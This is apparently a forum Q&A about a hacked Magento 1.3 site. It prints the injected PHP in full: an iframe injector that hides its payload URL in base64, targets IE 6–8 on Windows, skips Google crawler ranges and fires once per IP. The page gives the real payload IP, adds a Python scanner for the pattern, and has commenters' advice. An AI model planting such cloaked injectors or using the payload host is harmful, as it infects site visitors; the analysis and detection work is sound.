PHP web application (Magento) hacked; what does this injected code do?
I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what the purpose of this code is?
Also, how do I stop this, and how do I spot the vulnerability?
Thank you
<?php
// Injected snippet exactly as found; only comments and indentation were added for analysis.

// CIDR matcher: true when $ip lies inside $network, given as "a.b.c.d/bits" or "a.b.c.d/m.m.m.m".
function net_match($network, $ip) {
    $ip_arr       = explode('/', $network);
    $network_long = ip2long($ip_arr[0]);
    $x            = ip2long($ip_arr[1]);
    // If the suffix is a dotted mask use it as-is, otherwise build the mask from the prefix length.
    $mask    = long2ip($x) == $ip_arr[1] ? $x : 0xffffffff << (32 - $ip_arr[1]);
    $ip_long = ip2long($ip);
    return ($ip_long & $mask) == ($network_long & $mask);
}

$ip         = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];      // the original assigns this twice
$IP         = $_SERVER['REMOTE_ADDR'] . ".log";  // per-visitor marker file name
@mkdir('/tmp/Location/');                        // marker directory, errors silenced with @
// Payload URL hidden as base64; it decodes to hxxp://129.121.38.102/Home/index.php (defanged, do not visit).
$dfjgkbl = base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if (!file_exists("/tmp/Location/{$IP}")) {         // gate 1: only once per visitor IP
    if (                                           // gate 2: never for these ranges (several are Google crawler blocks)
        net_match('64.233.160.0/19', $ip) == 0 &&
        net_match('66.102.0.0/20', $ip) == 0 &&
        net_match('66.249.64.0/19', $ip) == 0 &&
        net_match('72.14.192.0/18', $ip) == 0 &&
        net_match('74.125.0.0/16', $ip) == 0 &&
        net_match('89.207.224.0/24', $ip) == 0 &&
        net_match('193.142.125.0/24', $ip) == 0 &&
        net_match('194.110.194.0/24', $ip) == 0 &&
        net_match('209.85.128.0/17', $ip) == 0 &&
        net_match('216.239.32.0/19', $ip) == 0 &&
        net_match('128.111.0.0/16', $ip) == 0 &&
        net_match('67.217.0.0/16', $ip) == 0 &&
        net_match('188.93.0.0/16', $ip) == 0
    ) {
        if (strpos($user_agent, "Windows") !== false) {       // gate 3: Windows only ...
            if (preg_match("/MSIE 6.0/", $user_agent) OR      // ... and Internet Explorer 6, 7 or 8
                preg_match("/MSIE 7.0/", $user_agent) OR
                preg_match("/MSIE 8.0/", $user_agent)
            ) {
                // Serve an invisible 1x1 iframe pointing at the payload, then drop the marker
                // so this IP never receives it again (makes the infection hard to reproduce).
                echo '<iframe frameborder=0 src="' . $dfjgkbl . '" width=1 height=1 scrolling=no></iframe>';
                touch("/tmp/Location/{$IP}");
            }
        }
    }
}
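The snippet has three gates: it fires at most once per visitor IP (the /tmp/Location marker), never for the listed address ranges, and only for Internet Explorer 6 to 8 on Windows. That is why the site owner, and Google's crawler, may never see the iframe. The Python script below is an added example, not part of the original question and not Magento code: it re-implements those gates so you can test which visitors would get the payload, and scans a webroot for the same injection pattern (a base64_decode() literal that decodes to a URL, an echoed <iframe>, the /tmp/Location marker and the MSIE user-agent check). The sample infected file is constructed inline, and the function and indicator names are my own choices.

```python
"""Added triage helper for the injected snippet above (example code, not from
the original post or from Magento). Part 1 re-implements the snippet's
cloaking gates; part 2 scans a webroot for the injection pattern."""
import base64
import ipaddress
import os
import re
import tempfile

# --- Part 1: which visitors get the iframe? ---------------------------------
# Ranges copied from the snippet's net_match() calls. Several are Google's
# crawler blocks, so Googlebot never receives the iframe.
SKIPPED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "64.233.160.0/19", "66.102.0.0/20", "66.249.64.0/19", "72.14.192.0/18",
    "74.125.0.0/16", "89.207.224.0/24", "193.142.125.0/24", "194.110.194.0/24",
    "209.85.128.0/17", "216.239.32.0/19", "128.111.0.0/16", "67.217.0.0/16",
    "188.93.0.0/16",
)]
TARGET_UA = re.compile(r"MSIE (6|7|8)\.0")  # the three preg_match() checks

def would_inject(ip: str, user_agent: str, already_served: bool = False) -> bool:
    """Mirror the snippet's gates: marker file absent, IP not in a skipped
    range, 'Windows' in the UA and IE 6/7/8. Anyone else gets a clean page."""
    if already_served:  # /tmp/Location/<ip>.log exists: one shot per IP
        return False
    if any(ipaddress.ip_address(ip) in net for net in SKIPPED_NETWORKS):
        return False
    return "Windows" in user_agent and TARGET_UA.search(user_agent) is not None

# --- Part 2: find the same injection in a tree of PHP files -----------------
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
INDICATORS = {  # indicator names chosen for this example
    "iframe_echo": re.compile(r"echo\s+['\"]<iframe", re.I),
    "tmp_marker": re.compile(r"/tmp/Location/"),
    "ua_cloak": re.compile(r"preg_match\(\s*['\"]/MSIE"),
}

def decode_literals(source: str) -> list:
    """(encoded, decoded) pairs for base64_decode() literals that hide a URL."""
    found = []
    for enc in B64_CALL.findall(source):
        try:
            plain = base64.b64decode(enc, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if plain.startswith(("http://", "https://")):
            found.append((enc, plain))
    return found

def scan_file(path: str) -> dict:
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    urls = decode_literals(src)
    if urls:
        hits.append("b64_url")
    return {"path": path, "indicators": sorted(hits), "urls": [u for _, u in urls]}

def scan_tree(root: str) -> list:
    """Walk a webroot; return only PHP files with at least one indicator."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".php", ".phtml")):
                r = scan_file(os.path.join(dirpath, name))
                if r["indicators"]:
                    results.append(r)
    return sorted(results, key=lambda r: r["path"])

# Constructed sample webroot: one clean file and one carrying the snippet's
# key lines (same payload literal as in the question).
INFECTED = """<?php
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}")) {
  if (preg_match("/MSIE 6.0/", $user_agent)) {
    echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1></iframe>';
  }
}
"""
CLEAN = "<?php\necho 'hello';\n"

def demo() -> list:
    """Write the sample tree, scan it, print hits; return (relpath, indicators)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app"))
        with open(os.path.join(root, "app", "Mage.php"), "w") as fh:
            fh.write(INFECTED)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(CLEAN)
        out = []
        for h in scan_tree(root):
            rel = os.path.relpath(h["path"], root).replace(os.sep, "/")
            print(rel, h["indicators"], [u.replace("http", "hxxp") for u in h["urls"]])
            out.append((rel, h["indicators"]))
        return out

if __name__ == "__main__":
    ie7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
    print(would_inject("203.0.113.5", ie7))   # ordinary IE7 visitor: True
    print(would_inject("66.249.66.1", ie7))   # Googlebot range: False
    demo()
```

To reproduce the infection yourself, send a request from an address outside the skipped ranges with an IE 6/7/8 Windows user agent, and delete /tmp/Location/<your-ip>.log between attempts; a second request from the same IP returns a clean page. Point scan_tree() at the real document root to list every file carrying the pattern, and compare the result with a clean copy of the same Magento release.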
Comments (5)
It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.
Just some friendly advice: if you are using FileZilla as your FTP client, it keeps saved passwords in an XML file, and there might be a virus on your PC that can connect through FileZilla to your server and write this into your files. Also check your cPanel and look for FTP accounts that were not created by you. This might not be the case; just check anyway.
I also had a similar problem with Total Commander... A virus used the TC FTP account, completely changed my website (Joomla CMS), and added similar malicious code to almost every PHP file.
It goes to:
DO NOT CLICK THAT (this is the HACKER LINK) >>>> 129.121.38.102 / Home/ index . php
The hacker creates a log of everything that happens on your website.
First, upgrade your Magento; it is a very old version at this point.
Your hacked code is generic PHP virus code we see all the time; it is an automated virus that goes from your PC to the server or from server to server.
You can also use a free plugin like magefirewall to protect your Magento.
P.S. I'm one of the developers.